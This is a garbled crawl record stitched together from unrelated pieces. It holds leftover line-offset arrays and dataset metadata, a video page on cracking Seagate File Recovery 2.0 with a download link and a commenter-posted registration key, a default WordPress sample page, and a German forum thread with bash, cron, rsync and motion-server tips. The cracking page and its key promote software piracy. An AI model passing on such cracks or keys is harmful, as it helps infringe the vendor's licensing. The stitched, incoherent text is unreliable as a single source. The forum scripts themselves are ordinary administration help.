5348,
5371,
5373,
5374,
5402,
5403,
5479,
5480,
5603,
5604,
5610,
5611,
5647,
5686,
5705,
5707,
5708,
5769,
5798,
5812,
5850,
5852,
5853,
5929,
5963,
6024,
6043,
6045,
6083,
6084,
6149,
6173,
6218,
6220,
6221,
6238,
6239,
6263,
6275,
6356,
6363,
6443,
6498,
6505,
6580,
6658,
6681,
6759,
6775,
6782,
6860,
6909,
6916,
6997,
7013,
7020,
7100,
7142,
7187,
7189,
7190,
7220,
7221,
7359,
7360,
7366,
7367,
7403,
7442,
7461,
7463,
7464,
7525,
7554,
7568,
7606,
7608,
7609,
7640,
7681,
7700,
7702,
7703,
7709,
7710,
7746,
7785,
7804,
7806,
7807,
7868,
7897,
7911,
7949,
7951,
7952,
7995,
8062,
8081,
8083,
8084,
8099,
8100,
8116,
8117,
8190,
8191,
8199,
8297,
8346,
8391,
8434,
8436,
8437,
8461,
8462,
8486,
8487,
8517,
8518,
8536,
8537,
8562,
8624,
8626,
8627,
8727,
8728,
8867,
8868,
9021,
9022,
9028,
9029,
9065,
9104,
9123,
9125,
9126,
9187,
9215,
9229,
9266,
9268,
9294,
9295,
9331,
9366,
9434,
9482,
9491,
9531,
9533,
9534,
9546,
9547,
9560,
9630,
9684,
9796,
9874,
9875
],
"line_end_idx": [
76,
77,
90,
91,
129,
130,
165,
166,
298,
299,
305,
306,
342,
381,
400,
402,
403,
464,
493,
507,
545,
547,
548,
623,
650,
688,
689,
695,
696,
705,
706,
720,
721,
737,
738,
748,
749,
757,
771,
813,
859,
904,
905,
920,
972,
1039,
1088,
1156,
1157,
1231,
1232,
1310,
1404,
1406,
1407,
1422,
1423,
1439,
1440,
1474,
1475,
1515,
1516,
1524,
1564,
1591,
1662,
1694,
1696,
1697,
1717,
1718,
1757,
1758,
1817,
1818,
1824,
1825,
1857,
1873,
1892,
1894,
1909,
1910,
1918,
1919,
1923,
1924,
1948,
1949,
1979,
1980,
2003,
2004,
2031,
2032,
2085,
2086,
2101,
2102,
2116,
2117,
2184,
2185,
2250,
2251,
2259,
2284,
2309,
2334,
2359,
2361,
2362,
2396,
2397,
2421,
2422,
2452,
2453,
2469,
2470,
2486,
2487,
2531,
2532,
2540,
2566,
2588,
2638,
2660,
2662,
2663,
2688,
2689,
2720,
2721,
2737,
2738,
2761,
2773,
2786,
2821,
2838,
2882,
2898,
2921,
2935,
2958,
3003,
3005,
3006,
3108,
3109,
3183,
3184,
3202,
3203,
3253,
3254,
3270,
3271,
3294,
3306,
3342,
3349,
3431,
3514,
3521,
3603,
3682,
3762,
3801,
3836,
3878,
3885,
3942,
3949,
4031,
4107,
4153,
4170,
4248,
4285,
4292,
4369,
4451,
4466,
4473,
4552,
4635,
4660,
4667,
4736,
4814,
4831,
4838,
4908,
4915,
4965,
5009,
5088,
5095,
5152,
5168,
5250,
5324,
5348,
5371,
5373,
5374,
5402,
5403,
5479,
5480,
5603,
5604,
5610,
5611,
5647,
5686,
5705,
5707,
5708,
5769,
5798,
5812,
5850,
5852,
5853,
5929,
5963,
6024,
6043,
6045,
6083,
6084,
6149,
6173,
6218,
6220,
6221,
6238,
6239,
6263,
6275,
6356,
6363,
6443,
6498,
6505,
6580,
6658,
6681,
6759,
6775,
6782,
6860,
6909,
6916,
6997,
7013,
7020,
7100,
7142,
7187,
7189,
7190,
7220,
7221,
7359,
7360,
7366,
7367,
7403,
7442,
7461,
7463,
7464,
7525,
7554,
7568,
7606,
7608,
7609,
7640,
7681,
7700,
7702,
7703,
7709,
7710,
7746,
7785,
7804,
7806,
7807,
7868,
7897,
7911,
7949,
7951,
7952,
7995,
8062,
8081,
8083,
8084,
8099,
8100,
8116,
8117,
8190,
8191,
8199,
8297,
8346,
8391,
8434,
8436,
8437,
8461,
8462,
8486,
8487,
8517,
8518,
8536,
8537,
8562,
8624,
8626,
8627,
8727,
8728,
8867,
8868,
9021,
9022,
9028,
9029,
9065,
9104,
9123,
9125,
9126,
9187,
9215,
9229,
9266,
9268,
9294,
9295,
9331,
9366,
9434,
9482,
9491,
9531,
9533,
9534,
9546,
9547,
9560,
9630,
9684,
9796,
9874,
9875,
10006
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 10006,
"ccnet_original_nlines": 368,
"rps_doc_curly_bracket": 0.004197480157017708,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.24037601053714752,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.029095789417624474,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.30438676476478577,
"rps_doc_frac_unique_words": 0.28700485825538635,
"rps_doc_mean_word_length": 4.744961738586426,
"rps_doc_num_sentences": 169,
"rps_doc_symbol_to_word_ratio": 0.0004476300091482699,
"rps_doc_unigram_entropy": 5.3354573249816895,
"rps_doc_word_count": 1439,
"rps_doc_frac_chars_dupe_10grams": 0.11672525107860565,
"rps_doc_frac_chars_dupe_5grams": 0.16359110176563263,
"rps_doc_frac_chars_dupe_6grams": 0.1340070366859436,
"rps_doc_frac_chars_dupe_7grams": 0.11672525107860565,
"rps_doc_frac_chars_dupe_8grams": 0.11672525107860565,
"rps_doc_frac_chars_dupe_9grams": 0.11672525107860565,
"rps_doc_frac_chars_top_2gram": 0.015377859584987164,
"rps_doc_frac_chars_top_3gram": 0.02240772917866707,
"rps_doc_frac_chars_top_4gram": 0.013181019574403763,
"rps_doc_books_importance": -912.5517578125,
"rps_doc_books_importance_length_correction": -912.5517578125,
"rps_doc_openwebtext_importance": -502.2756042480469,
"rps_doc_openwebtext_importance_length_correction": -502.2756042480469,
"rps_doc_wikipedia_importance": -178.9656219482422,
"rps_doc_wikipedia_importance_length_correction": -178.9656219482422
},
"fasttext": {
"dclm": 0.23757308721542358,
"english": 0.6331090331077576,
"fineweb_edu_approx": 2.5705971717834473,
"eai_general_math": 0.7577592134475708,
"eai_open_web_math": 0.03982632979750633,
"eai_web_code": 0.9133983850479126
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.0285",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "621.392",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,568,440,223,163,223,300
|
How To Crack and use Seagate File Recovery 2 0
Author: Luvlife4u
20494 View
1m 8s Lenght
33 Rating
link https://drive.google.com/open?id=0B9iS_p2W3XJHRnpDSWNBdDRySlk First as you all you must have seagate v 2.0, For the code to work. Registration is easy Than follow the steps in my videos
Comments
1. thanks
2. is this some sort of virus maleware, why your lan card disconnected
3. This worked perfectly!! Thanks!! Love the tunes too!
4. Thanks you! Thanks you very much! :)))
5. ok
6. the key is invalid
7. What is the name of the song ?
8. What is the company name?
9. Has it work for anyone?
10. The code is: RAAABQlIRz2JK1mYYDjMilg2w2QlncGDYrh4NFPrTm32Jn/FJqLIvG1s5HVCeqfQ61BeO3ly1IOyU/ChV7fLjV04/pB8
But is not working.
11. send the code
12. COULD PUT THE CODE TO FACILITATE LIFE
|
{
"url": "http://recovery-software.top/how-to-crack-and-use-seagate-file-recovery-2-0.html",
"source_domain": "recovery-software.top",
"snapshot_id": "crawl=CC-MAIN-2018-47",
"warc_metadata": {
"Content-Length": "13899",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SXGDWU77B5H23AWMKT2NLLGCPPD6IP6E",
"WARC-Concurrent-To": "<urn:uuid:c3bea883-2f95-4237-9ff3-48436f54e6b2>",
"WARC-Date": "2018-11-19T11:40:57Z",
"WARC-IP-Address": "94.152.165.98",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:R4P5ZKWCXKDHF3PS5YY6JDBFEHTZ2QR3",
"WARC-Record-ID": "<urn:uuid:700348ec-6925-4d14-9a4c-c91286f9dc73>",
"WARC-Target-URI": "http://recovery-software.top/how-to-crack-and-use-seagate-file-recovery-2-0.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:da1efb53-aa65-4cae-9306-3bc5c174b062>"
},
"warc_info": "isPartOf: CC-MAIN-2018-47\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-141-253-120.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
1,
3,
4,
51,
52,
53,
71,
82,
95,
105,
106,
107,
298,
299,
300,
301,
310,
311,
323,
396,
454,
498,
506,
530,
566,
597,
626,
738,
739,
763,
783
],
"line_end_idx": [
1,
3,
4,
51,
52,
53,
71,
82,
95,
105,
106,
107,
298,
299,
300,
301,
310,
311,
323,
396,
454,
498,
506,
530,
566,
597,
626,
738,
739,
763,
783,
826
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 826,
"ccnet_original_nlines": 31,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.270114928483963,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.04022989049553871,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.3218390941619873,
"rps_doc_frac_unique_words": 0.7322834730148315,
"rps_doc_mean_word_length": 4.834645748138428,
"rps_doc_num_sentences": 27,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.311360836029053,
"rps_doc_word_count": 127,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.04560260847210884,
"rps_doc_frac_chars_top_3gram": 0.02931595966219902,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -76.73432922363281,
"rps_doc_books_importance_length_correction": -76.73432922363281,
"rps_doc_openwebtext_importance": -45.26787567138672,
"rps_doc_openwebtext_importance_length_correction": -45.04635238647461,
"rps_doc_wikipedia_importance": -43.69437026977539,
"rps_doc_wikipedia_importance_length_correction": -43.69437026977539
},
"fasttext": {
"dclm": 0.9096848368644714,
"english": 0.800930917263031,
"fineweb_edu_approx": 1.322096347808838,
"eai_general_math": 0.025352420285344124,
"eai_open_web_math": 0.17441290616989136,
"eai_web_code": 0.0000335000004270114
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.467",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.67",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "5",
"label": "Social/Forum"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "2",
"label": "Click Here References"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "5",
"label": "Comment Section"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "1",
"label": "Technically Flawed"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "5",
"label": "Indeterminate"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-973,690,207,888,431,600
|
This is an example of a WordPress page, you could edit this to put information about yourself or your site so readers know where you are coming from. You can create as many pages like this one or sub-pages as you like and manage all of your content inside of WordPress.
Lasă un răspuns
Completeaza detaliile de mai jos sau apasa click pe una din imagini pentru a te loga:
WordPress.com Logo
You are commenting using your WordPress.com account. Log Out / Schimbă )
Twitter picture
You are commenting using your Twitter account. Log Out / Schimbă )
Facebook photo
You are commenting using your Facebook account. Log Out / Schimbă )
Connecting to %s
|
{
"url": "http://bedroomrecords09.wordpress.com/about/",
"source_domain": "bedroomrecords09.wordpress.com",
"snapshot_id": "crawl=CC-MAIN-2013-20",
"warc_metadata": {
"Content-Length": "57421",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:GTYF3NTJMEGAETBW5X7NPL2A4VCBV2MR",
"WARC-Concurrent-To": "<urn:uuid:1f4dba72-fb72-4d72-a9c6-7e8ba442dc95>",
"WARC-Date": "2013-06-19T18:04:04Z",
"WARC-IP-Address": "66.155.9.238",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:3VQ25KV22XSHDDB2GG34WLLLYEZ422IC",
"WARC-Record-ID": "<urn:uuid:e2dd9934-4589-4cc6-93db-1e2f918bf48c>",
"WARC-Target-URI": "http://bedroomrecords09.wordpress.com/about/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:80f06864-a0d1-4ec9-83dd-2170be4bc2f4>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-60-113-184.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2013-20\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for Spring 2013\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
270,
271,
287,
288,
374,
375,
394,
395,
468,
469,
485,
486,
553,
554,
569,
570,
638,
639
],
"line_end_idx": [
270,
271,
287,
288,
374,
375,
394,
395,
468,
469,
485,
486,
553,
554,
569,
570,
638,
639,
655
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 655,
"ccnet_original_nlines": 18,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.38759690523147583,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.13178294897079468,
"rps_doc_frac_unique_words": 0.6513761281967163,
"rps_doc_mean_word_length": 4.770642280578613,
"rps_doc_num_sentences": 8,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.085319519042969,
"rps_doc_word_count": 109,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.14423076808452606,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.046153850853443146,
"rps_doc_frac_chars_top_3gram": 0.0923076868057251,
"rps_doc_frac_chars_top_4gram": 0.12115384638309479,
"rps_doc_books_importance": -48.6939697265625,
"rps_doc_books_importance_length_correction": -57.614051818847656,
"rps_doc_openwebtext_importance": -27.529504776000977,
"rps_doc_openwebtext_importance_length_correction": -36.4495849609375,
"rps_doc_wikipedia_importance": -28.227218627929688,
"rps_doc_wikipedia_importance_length_correction": -37.14729690551758
},
"fasttext": {
"dclm": 0.06493616104125977,
"english": 0.6586005687713623,
"fineweb_edu_approx": 2.0298593044281006,
"eai_general_math": -0.000010009999641624745,
"eai_open_web_math": 0.03466570004820824,
"eai_web_code": -0.000010009999641624745
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.7",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "16",
"label": "Personal Blog"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-2,833,258,814,515,932,000
|
problemlösungen aus der computer- , netzwerktechnik- , linux welt, bash-scripting, drupal, etc. pp.
26 posts / 0 new
Letzter Beitrag
ad-min
problemlösungen aus der computer- , netzwerktechnik- , linux welt, bash-scripting, drupal, etc. pp.
Deutsch
hallo allerseits,
hier könnt ihr nach der registrierung eure meinungen über unsere kurse und unterrichtablauf austaschen, eure anregungen und wünsche herausbringen, neuigkeiten aus der computer- , netzwerktechnik- , webdesign-, drupal-, linuxwelt und bash-scripting veröffentlichen und eure technische probleme bzw. lösungen publizieren.
alle üblichen blog-, foren- und internet-etiquette regeln sind zu beachten: möglichst kurze und sachliche kommentare ... etc.pp.
(siehe link "Impressum")
ps. das forum ist momentan in deutsch und russisch herausgebracht, aber natürlich, können sie hier auch auf englisch posten.
---------------
The forum is currently published in German and Russian. Of course, you can write messages here also in English.
---------------
Форум публикуется (пока) на немецком и русском языках, что, конечно, не исключает возможности публиковать вам посты и на английском.
---------------
make script, not war!
---------------
s-3
drupal problem ...
nach dem update von drupal 6 auf 7 bekomme ich die Fehlermeldung:
Error at offset 11 of 37 bytes in variable_initialize() (line 936 of /var/www/?/data/www/?/includes/bootstrap.inc).
Hat jemand ein Tipp für die Lösung des Problems?
s-3
Drupal Problem ...
ich habe das modul "Variable Check" eingespielt - leider hat das nicht geholfen ...
:-(
il
Drupal Problem ...
Probier mal solche Methode:
Unter myphp -> mysql -> SQL DELETE Statement ausführen:
DELETE FROM variable WHERE name = 'NAME'
in deinem Fall NAME gleich 'unserialize' (nehme ich an)
ad-min
das modul "Variable Check"
normalerweise löst drupal (fast alle) probleme beim einspielen des neuen moduls
aber wer in der db mysql sich auskennt und das richtige statement abgibt der kommt schneller zurecht.
il
ubuntu cronjob funktioniert nicht ...
ubuntu: als normale user (kein root) funktioniert mein cronjob nicht und zwar:
crontab -e:
00 10 * * * ifconfig>/tmp/ifconfig_info
ad-min
Ubuntu Cronjob Funktioniert Nicht ...
in dem fall ist es ratsam absoluter pfad zu nutzen: anstatt ifconfig - /sbin/ifconfig
der cronjob wird dann so definiert:
00 10 * * * /sbin/ifconfig > /tmp/ifconfig_info
------------------
noch bessere lösung wäre es ein bash-skript schreiben (z.B "schreib_mein_ifconfig"), das skript ausführbar machen (chmod 755 schreib_mein_ifconfig) und erst dann als cronjob definieren
----------------------------------
cat schreib_mein_ifconfig
#!/bin/bash
/sbin/ifconfig > /tmp/ifconfig_info
----------------------------------
PS. WICHTIG:
das skript muss auch mit dem absoluten pfad in der crontab eingetragen werden:
crontab -e:
00 10 * * * /home/user/schreib_mein_ifconfig
il
danke, hat's geklappt!
danke, hat's geklappt!
s-3
drupal: artikel-problem ...
Die Aufgabe: ein Artikel NICHT auf der Startseite publizieren.
Bis jetzt habe ich keine Lösung gefunden!
Hilfe!
peter
hallo, man redet über
hallo, man redet über "Taxonomie" , "Vokabular" und "Begriffe" ,,,
ich habe neue seite erstellt, dann über taxonomie neuer vokabular und begriffe zugewiesen ...
das hat nicht funktioniert
:-(
s-3
motion server
hallo, motion-server funktioniert, aber die bilder von der webcam werden nicht gespeichert, obwohl ich target definiert habe:
target_dir /home/motion/motion
ad-min
motion server
hallo,
es muss die datei /etc/motion/motion.conf editiert werden und zwar:
bei ihnen (höchstwahrscheinlich) der parameter output_normal off es ist auch default-mäßig so. setzen sie der ob. gen. parameter auf on:
output_normal on
vorsicht! falls vor der kamera viel los ist, wird das verzeichnis (target_dir) immer grösser!
target_dir /home/motion/
sie sollen das verzeichnis entweder manuell (ab und an) leeren oder per skript über den cronjob
ad-min
motion server/ bash-scripting ...
was bash-scripting betrifft, hier ist ein kleines beispiel:
vi /usr/local/bin/script/script_mv_50
------------------------------
#!/bin/bash
#### variablen definition #########
A=`du /home/motion/motion|awk '{print $1}'`
###### falls das verzeichnis groesser als 5000 KB (5 MB) ist, loesch die erste 50 dateien (bilder) #########
if [[ $A -gt 5000 ]]
then
cd /home/motion/motion
mv `ls /home/motion/motion | head -50` /externe_festplatte;
else :
fi
------------------------------
das skript tut folgendes: die erste 50 dateien werden auf externe festplatte gemoved, sobald die größe des verzeichnisses grösser als 5000 KB ist.
um den vorgang zu automatisieren, kann das skript in crontab eingetragen werden. damit das skript mit 10 -minütigen rhythmus sich wiederholt, wird die folgende schreibweise benutzt:
crontab -e
*/10 * * * * /usr/local/bin/script/script_mv_50
ad-min
motion server - bash-scripting ...
es ergibt einen sinn die bilder (dateien) zu taren (einen tar-archiv zu erstellen) und dann extern zu sichern, falls an dem objekt viel los ist und sie das objekt nicht nur permanent beobachten möchten, sondern auch bilder speichern.
sie können, natürlich gleich das tar-archiv über das netz übertragen:
#!/bin/bash
#### variablen definition anfang #########
datum=`date +"%d"``date +%"m"``date +"%y"`
#### variablen definition ende #########
tar -czf - /home/motion/ | ssh ferner-rechner "cat > /home/$datum-objekt_monitoring_bilder.tgz"
dank der "datum-variable" können die bild-archive später leicht nach datum einordnen.
in dem bereich bash-scripting lässt es sich grenzenlos experimentieren, z.b.:
#!/bin/bash
#### variablen definition anfang #########
A=`ls /home/motion/motion | wc -l`
#### variablen definition ende #########
### falls die anzahl der bilder ändert sich, dann tu das und das ####
if [[ $A -ne 0 ]]
then
echo "ALARM"
else
echo "alles OK"
fi
anstatt echo "ALARM" können sie an sich selbst eine email senden (falls am linux rechner ein SSMTP-email-programm installiert ist) .... etc. pp. ...........
ad-min
bash-scripting ... rsync
man kann auch das synchronisation programm rsync (gleichzeitig ein netzwerkprotokoll) nutzen um die dateien über das netz sicher zu übertragen.
in dem fall wird das script so aussehen:
#!/bin/bash
rsync -av --delete -e ssh /home/motion/ user@ferner-rechner:/home/monitoring
ps. damit das skript einwandfrei funktioniert, müsste die passwortabfrage zwischen zwei rechnern (bzw. usern) unterdrückt werden.
wie das gemacht wird, ist ein anderes thema.
selaw2
Zufallsgenerator unter bash
Das Skript "zufallsgenerator": Starten sie ihren Computer und hören sie gleich ihre Lieblingsmusikstücke!
---------------------------------
cat -n /usr/local/bin/zufallsgenerator
#!/bin/bash
A=`ls /home/ich/Musik/relax/ | wc -l`;
B=`echo $((1 + $RANDOM % $A))`
/usr/bin/xplayer /home/ich/Musik/relax/$B
# Die Variable B bekommt ein zufälliger Wert von 1 bis A (A - maximale Anzahl ihre Dateien (bzw. Musikstücke) im Verzeichnis "relax")
---------------------------------
PS: Wenn sie das Skript in ihre Startprogramme hinzufügen, dann startet ihre Lieblingsmusikstück von dem Verzeichnis /home/ich/Musik/relax/ und zwar in eine zufällige Reihenfolge ;) und bei dem Start des Rechners hören sie gleich die Musik :)
PPS: Die Musikstücke sollen 1, 2, 3, ... A heißen (also natürliche Zahl), weil $RANDOM akzeptiert nur natürliche Zahlen (Ganzzahl) und das wäre ein "Problem" (in Anführungszeichen), weil es ist nicht wirklich ein Problem sondern eine Aufgabe.
Die Aufgabe ist: Wie der String-Dateiname (z.B.) "relaxmusik.mp4" wandle ich in eine Ganzzahl um?
..................
Hier ist die Lösung (Here is the solution):
RANDOM under bash accepts (unfortunately) only numeric numbers
The contents of the directory "/home/iam/musik"
ls /home/se/music/
relaxmusik.mp4
rockmusic.mp4
jazz.mp4
My task was: define file names numerically as follows:
the name "relaxmusik.mp4" should be "1"
the name "rockmusic.mp4" should be "2"
etc. pp.
Here is the solution:
I create the script "solution":
cat solution
#!/bin/bash
A="mv"
B=`ls /home/iam/musik | wc -l`
ls /home/iam/musik > /tmp/name-of-files
i=1
while [ $i -le $B ]
do
echo $A $i
i=`expr $i + 1`
done
The script "solution" does the following:
the output of the script is:
mv 1
mv 2
mv 3
and the file "/tmp/name-of-files" is generated.
Its content is:
relaxmusik.mp4
rockmusic.mp4
jazz.mp4
The output of the script "solution" will be redirected to the file /tmp/mv-number: ./solution > /tmp/mv-number
also cat /tmp/mv-number is:
mv 1
mv 2
mv 3
Now I use the command "paste" and "awk":
paste /tmp/mv-number /tmp/name-of-files | awk '{print $1, $3, $2}'
And ... I get the correct output:
mv relaxmusik.mp4 1
mv rockmusic.mp4 2
mv jazz.mp4 3
and the content of my directory "/home/iam/musik" is now:
ls /home/iam/musik
1
2
3
finished! -> now i can start random music playback under bash!
PS. I would be happy for your better suggestions :)
selaw2
ein skript "nachts_jeder_stunde"
#!/bin/bash
A=`ls /var/lib/motion/| wc -l`;
D=`date +"%d"``date +%"m"``date +"%y"`
E=`date | awk '{print $4}' | sed s/\:/-/g`
I=$D-$E
echo $I
cd /tmp/MOTION-ALARM/;
mkdir $D-$E
sleep 10
B=`ls /var/lib/motion/| wc -l`;
C=$[B-A]
echo $C
if [ $C -ne 0 ];
then
date > /tmp/MOTION-ALARM/$D-$E/datum-alarm
echo "ALARM"
echo "Info über motin-server" | sudo mail -s "Jemand ist in der Wohnung" [email protected]
else
echo "alles ruhig"
fi
############# Erklärung #############
Ich lasse das Skript über die Nacht jeder Stunde laufen von 01:10 bis 05:10 Uhr.
Ganz klar: Differenz zwischen zwei Variablen B und A sollte gleich 0 sein. Also Variable C=$[B-A]
gleich 0 - es gibt keine Bewegungen in der Wohnung - in der Wohnung ist dunkel!
Wenn das nicht der Fall sein sollte, dann (eindeutig): Jemand ist in der Wohnung! (Licht an, etc. pp.)
:(
selaw2
Das Skript speedtest (bzw. speedtest-cli)
Das (war) ist ein Python-Skript mit 1508 Zeilen von Matt Martz. Das Skript hat auf einmal nicht mehr funktioniert:
./speedtest
Retrieving speedtest.net configuration...
Traceback (most recent call last):
File "./speedtest", line 1508, in
main()
File "./speedtest", line 1498, in main
shell()
File "./speedtest", line 1401, in shell
speedtest = Speedtest()
File "./speedtest", line 743, in __init__
self.get_config()
File "./speedtest", line 799, in get_config
map(int, server_config['ignoreids'].split(','))
#################
Und es ist sehr bedauerlich gewesen. Vor kurzem habe ich mein Linux Mint upgedated und dann "speedtest-cli" installiert:
# sudo apt install speedtest-cli
erneutinstalliert. Jetzt funktioniert es wieder :)
# sudo /usr/bin/speedtest-cli
Retrieving speedtest.net configuration...
Testing from Dein Provider (XXX.XXX.XXX.XXX)...
Retrieving speedtest.net server list...
Selecting best server based on ping...
Hosted by 31173 Services AB (Frankfurt) [23.59 km]: 8.044 ms
Testing download speed................................................................................
Download: 49.93 Mbit/s
Testing upload speed......................................................................................................
Upload: 11.19 Mbit/s
If "speedtest-cli" don't work, then take "speedtest-cli --secure" - then it will work
selaw2
boot-images auflisten
